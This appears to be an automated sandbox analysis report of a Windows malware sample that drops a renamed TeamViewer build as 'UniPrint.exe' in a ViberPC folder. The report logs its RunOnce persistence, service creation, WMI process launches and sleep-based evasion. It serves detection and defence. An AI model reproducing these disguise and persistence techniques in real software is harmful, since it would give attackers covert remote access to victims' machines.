Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70983850 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,2_2_70983850
Source: wogZe27GBB.exeReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile read: C:\Users\user\Desktop\wogZe27GBB.exeJump to behavior
Source: wogZe27GBB.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\wogZe27GBB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\wogZe27GBB.exe 'C:\Users\user\Desktop\wogZe27GBB.exe'
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' fJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_70985F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004C6E36 AdjustTokenPrivileges,4_2_004C6E36
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_70985F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPCJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Local\Temp\nsaF7DE.tmpJump to behavior
Source: classification engineClassification label: mal76.evad.winEXE@23/18@4/5
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982AC0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,StrChrW,StrChrW,SysAllocString,StrChrW,SysAllocString,SysFreeString,VariantInit,VariantInit,StrChrW,StrChrW,lstrlenW,SysAllocStringLen,PathQuoteSpacesW,VariantInit,StrChrW,SysAllocString,StrChrW,VariantInit,StrChrW,StrChrW,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,2_2_70982AC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle,2_2_70983DC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle,4_2_70983DC0
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,74E3A680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404356
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70989B10 SwitchDesktop,SetThreadDesktop,LoadLibraryW,GetProcessHeap,HeapAlloc,RtlZeroMemory,GetSystemDirectoryW,PathAddBackslashW,lstrcatW,LoadLibraryExW,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,StrChrW,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,2_2_70989B10
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70983DC0 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle,2_2_70983DC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAAFKBAAAA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6032:120:WilError_01
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985180 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,2_2_70985180
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile written: C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.iniJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: wogZe27GBB.exeStatic file information: File size 1773472 > 1048576
Source: wogZe27GBB.exeStatic PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053E60D push ecx; ret 4_2_0053E620
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053BD8D push ecx; ret 4_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0295E1DD push esp; retf 17_3_0295E4B1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02960970 push eax; retf 17_3_02960971
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02935295 push ebx; iretd 17_3_029353CB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0293209A push ebx; retf 17_3_0293209B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292D483 push ebx; retf 17_3_0292D4FF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029304A8 push ebx; retn 0019h17_3_0293052F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029314AE push ebx; ret 17_3_029314AF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02931AD5 push ebx; iretd 17_3_02931AE3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02931CC2 push ebx; ret 17_3_02931D03
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029308C9 push ebx; iretd 17_3_02930A97
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292EEFF push 00000029h; iretd 17_3_0292EF04
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029330E2 push ebx; retf 17_3_029330E3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02930E14 push ebx; ret 17_3_02930F2B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02931004 push cs; iretd 17_3_02931005
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02931836 push ebx; retf 17_3_029318C3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02930039 push ebx; retf 0021h17_3_029300B7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0293083E push ebx; retf 17_3_0293083F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02933222 push ebx; ret 17_3_0293324B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292D826 push ebx; retf 17_3_0292D827
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0293042A push ebx; ret 17_3_029304A7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02933E40 push ebx; retf 17_3_02933E47
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0293027C push ebx; iretd 17_3_02930287
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292DC6A push ebx; ret 17_3_0292DC6B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029363B2 push ebx; iretd 17_3_029363B3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029369B4 push ebx; iretd 17_3_029369BF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02936BA1 push ebx; retf 17_3_02936CFF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029351AA push ebx; retf 17_3_029351AB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029357DD push ebx; retf 17_3_029359BB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02936F17 push ebx; iretd 17_3_02936F1F
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to dropped file
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to dropped file
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,4_2_004E177C
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\ParametersJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70983920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW,2_2_70983920
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004FB7F94_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004DC9D64_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00500C6A4_2_00500C6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004FFF684_2_004FFF68
Source: C:\Windows\System32\svchost.exe TID: 6704Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 7164Thread sleep count: 103 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 7164Thread sleep time: -51500s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 2392Thread sleep count: 80 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 2392Thread sleep time: -40000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,2_2_7098B420
